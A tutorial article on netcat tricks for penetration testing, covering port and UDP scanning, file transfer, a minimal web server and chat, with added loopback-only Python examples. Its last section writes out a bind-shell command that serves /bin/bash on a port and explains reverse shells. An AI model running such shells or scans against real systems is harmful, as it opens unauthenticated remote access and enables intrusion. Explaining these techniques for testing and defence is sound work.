
Useful tricks when working with netcat



In this article I will discuss the popular netcat utility and useful tricks when working with it.


Netcat is a Unix utility for opening TCP and UDP connections and for reading data from them and writing data to them. Despite its usefulness and simplicity, many people do not know how to use it and unfairly pass it over.


With this utility you can carry out several stages of a penetration test. That comes in handy when nothing can be installed on the target machine (or installing anything would attract attention), when the platform is constrained (IoT and embedded devices, for example), and so on.


What can be done with netcat is shown by the practical examples below. In general, netcat can stand in for a number of Unix utilities, so it can be thought of as a kind of multitool for certain tasks.


Practical examples


Often, when a particular host has to be checked, people reach for telnet or for the client of the service in question to identify the host or grab its banner. Here is how netcat can help:


Checking whether TCP port 12345 is open (-v prints the result, -n skips DNS lookups):


$ nc -vn 192.168.1.100 12345

nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

$ nc -v 192.168.1.100 22

Connection to 192.168.1.100 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH

A service that speaks first, like SSH here, shows its banner right away; for protocols that wait for the client (HTTP, for instance) you have to type a request yourself before anything comes back. "Connection refused" means the host answered with a RST, so the host itself is up; no answer at all until the timeout (set with -w) usually means a firewall is dropping the packets.

Scanning TCP ports with netcat:


$ nc -vnz 192.168.1.100 20-24

The -z flag puts netcat into zero-I/O mode: it only completes the connection, sends nothing, closes immediately and reports one line per port. Ports 20, 21, 23 and 24 are closed here and only 22 accepts the connection. (The "connectx" and "found N connections" lines are extra diagnostics from the macOS build of nc; on Linux you get just the failed/succeeded lines.)


nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
     1: flags=82<CONNECTED,PREFERRED>
        outif en0
        src 192.168.1.100 port 50168
        dst 192.168.1.100 port 22
        rank info not available
        TCP aux info available
Connection to 192.168.1.100 port 22 [tcp/*] succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused
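The same check as a few lines of Python, added here as an example that is not part of the original article. It does what nc -v and nc -z do underneath, a TCP connect with a timeout, and tells the three outcomes apart: the handshake completed (netcat's "succeeded!"), a RST came back ("Connection refused"), or nothing came back at all. The listener it talks to and its SSH-like banner are constructed for the demo and live on loopback; the rest is the standard library.

```python
# Added example (not from the article): the TCP checks behind `nc -v host port`
# and `nc -vz host first-last`, written with Python's socket module so the
# three outcomes netcat prints become explicit states. The listener and the
# banner are constructed for the demo and run on loopback only.
import socket
import threading


def tcp_check(host, port, timeout=1.0, grab_banner=True):
    """Connect to host:port and classify the result.

    Returns (state, banner) where state is:
      'open'     -> handshake completed (nc prints 'succeeded!')
      'closed'   -> RST came back (nc prints 'Connection refused')
      'filtered' -> nothing came back before the timeout (firewall drop, host down)
    banner holds whatever the service sent first, as `nc -v` shows for SSH.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not grab_banner:
                return "open", b""          # -z behaviour: connect, say nothing, close
            try:
                banner = s.recv(256)        # sshd, smtpd, ftpd speak first ...
            except socket.timeout:
                banner = b""                # ... HTTP waits for us and stays silent
            return "open", banner
    except ConnectionRefusedError:
        return "closed", b""
    except (socket.timeout, OSError):
        return "filtered", b""


def scan_range(host, first, last, timeout=1.0):
    """Equivalent of `nc -vnz host first-last`: connect state per port, no I/O."""
    return {port: tcp_check(host, port, timeout, grab_banner=False)[0]
            for port in range(first, last + 1)}


# --- constructed fixtures for the demo -------------------------------------
def start_banner_server(banner=b"SSH-2.0-OpenSSH_example\r\n"):
    """Loopback listener that greets like sshd does; the banner is made up."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))              # port 0: let the OS pick a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                 # srv.close() ends the thread
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:             # a -z style client may already be gone
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port():
    """Find a port nobody listens on, so the 'closed' case can be shown."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Probe one open and one closed loopback port; returns the raw results."""
    srv, port = start_banner_server()
    try:
        open_result = tcp_check("127.0.0.1", port)
        closed_result = tcp_check("127.0.0.1", unused_port())
        sweep = scan_range("127.0.0.1", port, port)
    finally:
        srv.close()
    return open_result, closed_result, sweep


if __name__ == "__main__":
    (state, banner), (closed, _), sweep = demo()
    print(f"service port: {state}, banner={banner!r}")
    print(f"unused port:  {closed}")
    print(f"range scan:   {sweep}")
```

The point of the explicit 'filtered' state is the one netcat leaves implicit: a refused connection proves the host is alive, while a timeout proves nothing about the port and usually points at a firewall in between.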

Scanning UDP ports.


Scanning UDP ports with nmap requires root privileges. When you do not have them, netcat can help here too:


$ nc -vnzu 192.168.1.100 5550-5560

Connection to 192.168.1.100 port 5555 [udp/*] succeeded!

Treat UDP results with caution. There is no handshake, so "succeeded" only means that no ICMP port-unreachable message came back within the timeout: a port that is open but silent, a port filtered by a firewall and a host that rate-limits ICMP errors all look the same. Only a refused port (ICMP unreachable received) is a definite answer.
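To make that caveat concrete, here is the probe behind nc -zu in Python, added as an example that is not from the original article. The three loopback listeners (one that echoes, one that is bound but never answers, one that does not exist) are constructed so that all three outcomes can be produced on a single machine; the payload byte is arbitrary.

```python
# Added example (not from the article): what `nc -vnzu host first-last` can and
# cannot tell you. UDP has no handshake, so the only negative evidence is an
# ICMP port-unreachable reply; everything else looks like 'succeeded'. The
# three loopback listeners below are constructed for the demo.
import socket
import threading


def udp_probe(host, port, timeout=1.0, payload=b"\x00"):
    """Send one datagram and classify the answer.

      'closed'        -> ICMP port unreachable came back; on a *connected*
                         UDP socket the kernel reports it as ECONNREFUSED
      'open'          -> the service answered (only protocols that reply to junk)
      'open|filtered' -> silence: open but quiet, or dropped by a firewall.
                         This is the state nc prints as 'succeeded!'
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))             # connect() so ICMP errors surface
        try:
            s.send(payload)
            s.recv(1024)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def udp_scan(host, first, last, timeout=1.0):
    """Equivalent of `nc -vnzu host first-last`, with honest state names."""
    return {port: udp_probe(host, port, timeout) for port in range(first, last + 1)}


# --- constructed fixtures for the demo -------------------------------------
def start_udp_echo():
    """A chatty service: echoes every datagram, so the probe sees 'open'."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))

    def serve():
        while True:
            try:
                data, peer = srv.recvfrom(1024)
            except OSError:                 # srv.close() ends the thread
                return
            srv.sendto(data, peer)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_udp_silent():
    """A quiet service: bound, never replies (like an SNMP agent given the
    wrong community string). Indistinguishable from a firewalled port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    return srv, srv.getsockname()[1]


def unused_udp_port():
    """A port with no socket behind it, so the kernel answers with ICMP."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Probe all three kinds of port on loopback; returns {name: state}."""
    echo, echo_port = start_udp_echo()
    silent, silent_port = start_udp_silent()
    try:
        return {
            "echo": udp_probe("127.0.0.1", echo_port),
            "silent": udp_probe("127.0.0.1", silent_port),
            "closed": udp_probe("127.0.0.1", unused_udp_port()),
        }
    finally:
        echo.close()
        silent.close()


if __name__ == "__main__":
    for name, state in demo().items():
        print(f"{name:7s} -> {state}")
```

Compare the output with nmap's vocabulary: netcat's single "succeeded" line collapses open and open|filtered into one, which is why a UDP sweep with nc tends to report far more "open" ports than really exist.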

Sending a UDP packet


$ echo -n "foo" | nc -u -w1 192.168.1.100 161

-w1 makes netcat give up after one second of silence instead of waiting for a reply that may never come. This is useful when poking at network devices (161/udp is SNMP), and the same pattern works for any UDP service you want to send a hand-crafted payload to.


Receiving data on a UDP port and printing it


$ nc -lu -p 7777

Netcat handles only one UDP peer per run: once the first datagram arrives it locks onto that source address and port, and datagrams from anyone else are ignored (that includes a second echo ... | nc -u invocation, which gets a fresh source port), so after the first message nothing more appears. If you need to accept several messages, run it in a while true loop:


$ while true; do nc -lu -p 7777; done

File transfer


Netcat can both receive files and send them to a remote host. Start the receiving side first, so that something is listening when the sender connects; the receiver redirects everything it gets into a file:

nc -lvp 5555 > /tmp/1.txt

Then, on the sending side, feed the file into netcat's standard input:

nc 192.168.1.100 5555 < 1.txt

Netcat gives no feedback about what arrived, so compare a checksum of both copies afterwards (sha256sum on each end, for instance). If the transfer seems to hang after the whole file has gone out, your netcat build does not close the connection at end of input on its own: OpenBSD nc needs -N for that and the Debian/traditional builds -q 0.
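Both ends of the transfer in Python, added as an example that is not from the original article, with the checksum step built in so the receiver can prove it got exactly what was sent. The sample file, the temporary paths and the loopback port are constructed for the demo; the shutdown() call is the end-of-input signal discussed above.

```python
# Added example (not from the article): both sides of the netcat file transfer,
# `nc -lvp 5555 > /tmp/1.txt` and `nc 192.168.1.100 5555 < 1.txt`, plus the
# check netcat itself never does: a SHA-256 computed on each side. The sample
# file, temporary paths and loopback port are constructed for the demo.
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def receive_file(listener, dest_path):
    """Receiver (`nc -lvp PORT > file`): must be running before the sender
    connects. Writes until EOF and returns the SHA-256 of what hit the disk."""
    digest = hashlib.sha256()
    conn, _ = listener.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(CHUNK)
            if not chunk:                      # b'' means the sender closed
                break
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()


def send_file(host, port, src_path):
    """Sender (`nc HOST PORT < file`): stream the file, then signal EOF with
    shutdown(SHUT_WR). That shutdown is what some netcat builds omit unless
    asked (-N on OpenBSD nc, -q 0 on Debian/traditional nc), which is why a
    finished transfer can appear to hang."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as src:
        while True:
            chunk = src.read(CHUNK)
            if not chunk:
                break
            s.sendall(chunk)
            digest.update(chunk)
        s.shutdown(socket.SHUT_WR)
    return digest.hexdigest()


def demo():
    """Run both ends on loopback. Returns (sent_hash, received_hash,
    source_size, received_size); the two hashes must match."""
    with tempfile.TemporaryDirectory() as workdir:
        src = os.path.join(workdir, "1.txt")
        dst = os.path.join(workdir, "received.txt")
        with open(src, "wb") as f:                 # constructed sample payload
            f.write(b"".join(b"line %05d: netcat moves bytes, not checksums\n" % i
                             for i in range(20000)))

        listener = socket.socket()
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        port = listener.getsockname()[1]

        result = {}
        rx = threading.Thread(target=lambda: result.update(rx=receive_file(listener, dst)))
        rx.start()                                 # receiver is listening first ...
        result["tx"] = send_file("127.0.0.1", port, src)   # ... then the sender connects
        rx.join()
        listener.close()
        return result["tx"], result["rx"], os.path.getsize(src), os.path.getsize(dst)


if __name__ == "__main__":
    tx, rx, src_size, dst_size = demo()
    print(f"sent     {tx} ({src_size} bytes)")
    print(f"received {rx} ({dst_size} bytes)")
    print("OK" if tx == rx else "MISMATCH")
```

With plain netcat the same verification is two sha256sum runs, one on each host; the code just shows why it matters: nothing in the TCP stream itself tells the receiver whether the sender finished or was cut off.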

Netcat as the simplest web server.


Netcat can serve as the simplest possible web server for showing HTML pages:


$ while true; do nc -lp 8888 < index.html; done

Open http://<netcat host>:8888/index.html in a browser. Be aware of what this does and does not do: netcat never reads the request, so the same file is returned whatever path is asked for; the file is sent as-is, with no HTTP status line or headers; and only one client is served per loop iteration. To use the standard web server port 80 you will have to run nc with root privileges, since ports below 1024 are privileged:


$ while true; do sudo nc -lp 80 < test.html; done

Chat between nodes


On the first node (192.168.1.100):


 $ nc -lp 9000 

On the second node:


 $ nc 192.168.1.100 9000 

After executing the commands, all characters entered into the terminal window on any of the nodes will appear in the terminal window of the other node.


Bind and reverse shells


With netcat you can set up a convenient remote shell. The command below makes netcat on the target listen and hand the connection to /bin/bash, which is strictly a bind shell (the -e option exists in the traditional netcat and in ncat, not in the OpenBSD build):


nc -e /bin/bash -lp 4444

Now you can connect to the remote host and get its shell:


$ nc 192.168.1.100 4444

A reverse shell works the other way round: you listen on your own machine and the target runs nc -e with your address and port, so that the connection goes outwards, which is what usually gets through firewalls and NAT. Either way the session is unencrypted and unauthenticated, so anyone who can reach the port gets the same shell.

So do not give up when the usual, often rather heavyweight, tools are unavailable: the problem can frequently be solved with improvised means.



Source: https://habr.com/ru/post/336596/

